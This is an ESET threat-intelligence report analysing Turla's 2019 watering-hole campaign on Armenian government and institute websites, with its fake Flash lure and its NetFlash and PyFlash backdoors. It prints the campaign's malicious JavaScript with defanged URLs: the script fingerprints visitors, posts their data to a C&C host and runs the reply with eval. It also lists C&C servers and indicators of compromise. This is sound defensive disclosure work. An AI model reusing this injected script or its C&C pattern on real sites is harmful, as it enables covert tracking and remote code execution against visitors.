# Tracking Turla: New backdoor delivered via Armenian watering holes **[welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes](https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/?fbclid=IwAR1kJQ1vBjLuom_3JXSb5FjH8p2zB83vRzBoCLszoL9y6vNvbg9XmJpEz-k)** March 12, 2020 ESET researchers found a watering hole (aka strategic web compromise) operation targeting several high-profile Armenian websites. It relies on a fake Adobe Flash update lure and delivers two previously undocumented pieces of malware we have dubbed NetFlash and PyFlash. Various aspects of this campaign lead us to attribute this operation to Turla, an infamous espionage group active for more than ten years. Its main targets include governmental and military organizations. We have previously reported multiple campaigns of this group including [Mosquito and LightNeuron.](https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf) This recent operation bears similarities to several of Turla’s watering hole campaigns that we [have tracked in the past years. In particular, the modus operandi is similar to a campaign we](https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/) uncovered in 2017. The various pieces of JavaScript used there are almost identical to those in this campaign, but the targets and payloads are different. ## Targeted websites In this specific operation, Turla has compromised at least four Armenian websites, including two belonging to the government. Thus, it is likely the targets include government officials and politicians. According to ESET telemetry, the following websites were compromised: armconsul[.]ru: The consular Section of the Embassy of Armenia in Russia mnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh aiisa[.]am: The Armenian Institute of International and Security Affairs adgf[.]am: The Armenian Deposit Guarantee Fund We have indications that these websites were compromised since at least the beginning of 2019. We notified the Armenian national CERT and shared our analysis with them before publication. Turla operators leveraged unknown access methods to these websites to insert a piece of malicious JavaScript code. For example, for mnp.nkr[.]am, they appended obfuscated code at the end of jquery-migrate.min.js (a common JavaScript library), as shown in Figure 1. ----- _Figure 1. Obfuscated JavaScript code injected into the mnp.nkr[.]am website_ This code loads an external JavaScript from skategirlchina[.]com/wpincludes/data_from_db_top.php. We analyze this code in the next section. Since the end of November 2019, we noticed that skategirlchina[.]com was not delivering malicious scripts anymore. Thus, it is likely the Turla operators have suspended this watering hole operation. ## Fingerprinting and malware delivery Upon visiting a compromised webpage, the second-stage malicious JavaScript is delivered by skategirlchina[.]com and fingerprints the visitor’s browser. Figure 2 shows the main function of this script. [If it is the first time the user’s browser executes the script, it will add an evercookie with a](https://en.wikipedia.org/wiki/Evercookie) seemingly random MD5 value provided by the server, different at each execution of the script. [The implementation of the evercookie is based on code available on GitHub. It uses multiple](https://github.com/samyk/evercookie) storage places such as the local database, local shared objects (Flash cookies), Silverlight storage, etc., to store the cookie value. In comparison to a regular cookie, it will be much more persistent as it won’t be deleted if the user just deletes the browser’s cookies. This evercookie will be used to track whether the user visits one of the compromised websites again. When the user comes back for a second time, the previously stored MD5 value will be used to identify them. Then, it collects several pieces of information including the browser plugin list, the screen resolution and various operating system information. This is sent to the C&C server in a POST request. If there is a reply, it is assumed to be JavaScript code and is executed using the eval function. ##### 1 2 3 4 5 ##### […] function f_ec(){ var ec = new evercookie({domain:'http://skategirlchina[.]com/wp- includes/data_from_db_top.php',baseurl:'?http://skategirlchina[.]com/wp- includes/data_from_db_top.php'}); ec.get("ec", function(value) { ----- ##### 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 ##### if (value!=undefined){ var jsonText = {'ec': ''+value+'', 'scp':screen.pixelDepth==undefined?''+0+'':''+screen.pixelDepth+ '', 'scw':''+screen.width+'', 'sch':''+screen.height+'', 'bn':''+bn+'', 'bv':''+bv+'', 'bc':''+bc+'', 'osn':''+osn+'', 'osv':''+osv+'', 'osc':''+osc+'', 'adr':''+adr+'', 'pdr':''+pdr+'', 'fla':''+fla+'', 'jav':''+jav+'', 'wmp':''+wmp+'', 'msw':''+msw+'', 'qui':''+qui+'', 'sho':''+sho+'', 'type':'info', 'tiz': ''+(new Date().getTimezoneOffset()/60)+'' }; var json = JSON.stringify(jsonText); ajax({ content_type : 'application/json', url: 'http://skategirlchina[.]com/wp-includes/data_from_db_top.php? http://skategirlchina[.]com/wp-includes/data_from_db_top.php', crossDomain: true, type: 'POST', ----- ##### 35 36 37 38 39 40 41 42 43 ##### data: json, onSuccess: function(m){ eval(m); } }); } else{ ec.set('ec', ''); setTimeout(f_ec,1500); } _Figure 2. Fingerprint script (malicious URLs defanged)_ If the visitor is deemed interesting, the server replies with a piece of JavaScript code that creates an iframe. Data from ESET telemetry suggests that, for this campaign, only a very limited number of visitors were considered interesting by Turla’s operators. This iframe displays a fake Adobe Flash update warning to the user, shown in Figure 3, in order to trick them into downloading a malicious Flash installer. _Figure 3. Fake Adobe Flash update iframe_ ----- We did not observe the use of any browser vulnerabilities. The compromise attempt relies only on this social engineering trick. Once the malicious executable is downloaded from the same server as the iframe’s JavaScript, and if the user launches it manually, a Turla malware variant and a legitimate Adobe Flash program are installed. Figure 4 is an overview of the compromise process from initially visiting one of the compromised Armenian websites to the delivery of a malicious payload. ----- _Figure 4. Overview of the watering hole operation_ ## Malware Once the user executes the fake installer, it will execute both a Turla malware variant and a legitimate Adobe Flash installer. Thus, the user is likely to believe that the update warning was legitimate. ### Before September 2019: Skipper Prior to the end of August 2019, the victim would receive a RAR-SFX archive containing a legitimate Adobe Flash v14 installer and a second RAR-SFX archive. The latter contains the various components of a backdoor known as Skipper that has been previously attributed to Turla. [It was documented in 2017 by researchers from Bitdefender, and a more recent version was](https://labs.bitdefender.com/wp-content/uploads/downloads/new-pacifier-apt-components-point-to-russian-linked-turla-group/) [documented by Telsy in May 2019.](https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/) Given that there are only minor changes between the documented versions and the most recent ones, we won’t provide a detailed analysis here. One interesting change is that the Skipper communication module uses the server that hosts this campaign’s remote JavaScripts and malicious binaries for its C&C server, specifically skategirlchina[.]com/wp-includes/ms-locale.php. ### From September 2019: NetFlash and PyFlash At the end of August 2019, we noticed that the payload delivered by skategirlchina[.]com changed. #### NetFlash (.NET downloader) The new payload was a .NET application that dropped an installer for Adobe Flash v32 in %TEMP%\adobe.exe, and NetFlash (a .NET downloader) in %TEMP%\winhost.exe. According to their compilation timestamps, the malware samples were compiled at the end of August 2019 and at the beginning on September 2019, right before being uploaded to the watering hole’s C&C server. NetFlash downloads its second stage malware from a hardcoded URL and establishes persistence for this new backdoor using a Windows scheduled task. Figure 5 shows the NetFlash function that downloads the second stage malware, named PyFlash. We also encountered another NetFlash sample, likely compiled at the end of August 2019, with a different hardcoded C&C server: 134.209.222[.]206:15363. ----- _Figure 5. Main function of NetFlash_ #### PyFlash This second stage backdoor is a py2exe executable. py2exe is a Python extension to convert a Python script into a standalone Windows executable. To our knowledge, this is the first time the Turla developers have used the Python language in a backdoor. The backdoor communicates with its hardcoded C&C server via HTTP. The C&C URL and other parameters such as the AES key and IV used to encrypt all network communications are specified at the beginning of the script, as shown in Figure 6. _Figure 6. Global variables in the PyFlash Python script_ The main function of the script, shown in Figure 7, sends information about the machine to the C&C server. This is the output of the functions from the commands list seen in Figure 6. It includes OS-related commands (systeminfo, tasklist) and network-related commands (ipconfig, getmac, arp). ----- _Figure 7. Main function of PyFlash_ The C&C server can also send backdoor commands in JSON format. The commands implemented in this version of PyFlash are: Download additional files from a given HTTP(S) link. Execute a Windows command using the Python function subprocess32.Popen. Change the execution delay: modifies the Windows task that regularly (every X minutes; 5 by default) launches the malware. Kill (uninstall) the malware. To confirm this instruction the malware sends a POST request to the C&C server with the following string: _I’m dying :(_ _Tell my wife that i love her…_ Then, the output of the command is sent back to the operators, encrypted with AES, via a POST request. ## Conclusion Turla is still using watering hole attacks as one of its initial access tactics. Interestingly, this campaign relies on a well-known social engineering trick – a fake Adobe Flash update warning – in order to induce the user to download and install malware. On the other hand, the payload has changed, probably in order to evade detection, as Skipper has been known for many years. They switched to NetFlash, which installs a backdoor we call PyFlash and that is developed in the Python language. _We will continue monitoring new Turla activities and will publish relevant information on our blog._ _[For any inquiries, contact us as threatintel@eset.com. Indicators of Compromise can also be](mailto:threatintel@eset.com)_ _[found on our GitHub repository.](https://github.com/eset/malware-ioc/tree/master/turla#turla-watering-hole-armenia)_ ## Indicators of Compromise (IoCs) ----- ### Compromised websites http://www.armconsul[.]ru/user/themes/ayeps/dist/js/bundle.0eb0f2cb2808b4b35a94.js http://mnp.nkr[.]am/wp-includes/js/jquery/jquery-migrate.min.js http://aiisa[.]am/js/chatem/js_rA9bo8_O3Pnw_5wJXExNhtkUMdfBYCifTJctEJ8C_Mg.js adgf[.]am ### C&C servers http://skategirlchina[.]com/wp-includes/data_from_db_top.php http://skategirlchina[.]com/wp-includes/ms-locale.php http://37.59.60[.]199/2018/.config/adobe http://134.209.222[.]206:15363 http://85.222.235[.]156:8000 ### Samples ##### SHA-1 Timestamp Description ##### ESET Detec‐ tion Name MSIL/Turla.D ##### 973620A7AB28A2CBA82D‐ C2A613CD24ED43734381 B6567F988C9ACC5DF3CB‐ D72409FC70D54EA412BB 9F81710B85AA7088505C1EE CCE9DA94A39A2DC06 32430B11E42EDE‐ B63A11E721927FF‐ BABE7C9CFEA 620A669EC0451C9F079F‐ B4731F254AC577902E5E ##### Thu Aug 29 04:14:46 UTC 2019 Tue Sep 3 11:12:04 UTC 2019 Thu Aug 29 04:12:33 UTC 2019 ##### Wed Aug 29 09:43:18 UTC 2018 ##### NetFlash Dropper ##### NetFlash MSIL/Turla.D NetFlash MSIL/Turla.F ##### N/A PyFlash Win32/Turla.EM ##### Skipper com‐ munication DLL ##### Win32/Turla.EJ ## MITRE ATT&CK techniques ##### Tactic ID Name Description ##### Initial Access ##### T1189 Drive-by Compromise ##### Turla compromised high-value websites to deliver malware to the visitors. ##### Execution T1204 User Execution A fake Flash installer is intended to trick the user into launching the malware. ----- ##### Tactic ID Name Description ##### Persis‐ tence ##### T1053 Scheduled Task NetFlash and PyFlash persist using scheduled tasks. ##### Discovery T1016 System Network Configuration Discovery ##### PyFlash executes ipconfig /all, getmac and arp -a ##### T1057 Process Discovery PyFlash executes tasklist ##### PyFlash executes systeminfo PyFlash uses AES-128 in CBC mode to encrypt C&C communications. NetFlash uses port 80. PyFlash uses port 8,000. A NetFlash sample uses port 15,363. NetFlash and PyFlash use HTTP. The output of PyFlash surveillance and C&C commands are exfiltrated using the C&C protocol. ##### Com‐ mand and Control Exfiltra‐ tion ##### T1082 System Information Discovery T1032 Standard Crypto‐ graphic Protocol T1043 Commonly Used Port T1065 Uncommonly Used Port T1071 Standard Application Layer Protocol T1041 Exfiltration Over Command and Con‐ trol Channel [Matthieu Faou 12 Mar 2020 - 11:30AM](https://www.welivesecurity.com/author/mfaou/) -----